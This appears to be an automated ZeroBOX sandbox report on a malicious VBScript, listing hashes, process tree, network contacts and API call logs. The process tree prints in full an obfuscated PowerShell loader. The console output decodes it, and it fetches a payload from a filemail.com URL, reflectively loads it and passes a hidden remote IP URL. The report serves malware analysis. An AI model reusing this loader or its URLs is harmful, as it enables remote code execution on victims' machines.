Summary | ZeroBOX

Tuesdayconstraints.vbs

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6403_us March 3, 2025, 2:44 p.m. March 3, 2025, 2:47 p.m.
Size 173.1KB
Type UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5 46515ec0ad1711350ac2cbfc5cf23243
SHA256 043545d1eb3eca5d8aa58e4e9e863c3c2340f46102d2c9dce2dcf71d41466d68
CRC32 CEBA0031
ssdeep 1536:G9bjgvyD1sRtfECiMwV5TohyRJ1vr2LBJpUD:QpeRGTtohyRJ1vr2LBJpUD
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Tuesdayconstraints.vbs

    652
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

      2132

Name Response Post-Analysis Lookup
1007.filemail.com 142.215.209.72
IP Address Status Action
142.215.209.72 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: True
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: Exception calling "Invoke" with "2" argument(s): "Could not load file or assemb
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ly 'System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: or one of its dependencies. The system cannot find the file specified."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:962
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $Bacchanalians = 'txt.44444444444444444444444444446esab/71.022.3.291//:ptth';
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: $druggiest = $Bacchanalians -replace '#', 't';$Doncaster = 'https://1007.filema
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: il.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef';$parities = New-Objec
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: t System.Net.WebClient;$appraisers = $parities.DownloadData($Doncaster);$procra
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: stinators = [System.Text.Encoding]::UTF8.GetString($appraisers);$blephara = '<<
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: BASE64_START>>';$picroglycion = '<<BASE64_END>>';$suicide = $procrastinators.In
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: dexOf($blephara);$meadow = $procrastinators.IndexOf($picroglycion);$suicide -ge
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: 0 -and $meadow -gt $suicide;$suicide += $blephara.Length;$agkistrodon = $meado
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: w - $suicide;$crystal = $procrastinators.Substring($suicide, $agkistrodon);$com
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: paginate = [System.Convert]::FromBase64String($crystal);$zoanthodemic = [System
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: .Reflection.Assembly]::Load($compaginate);$gravidate = [dnlib.IO.Home].GetMetho
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: d('VAI').Invoke <<<< ($null, [object[]] @($druggiest,'','','','MSBuild','','','
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x00000107
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffbd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffc50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffc50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffc50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002004d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002004d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002004d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002004d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002004d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002004d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffc50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffc50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffc50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00200590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffd90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ffe10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00200150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00200150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04e3e8b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04e3e8b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04e3e8b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04e3e8b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04e3e8b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x04e3e8b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://1007.filemail.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef
request GET https://1007.filemail.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02790000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2132
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2132
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02971000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02972000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a27000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a28000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a29000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a2b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

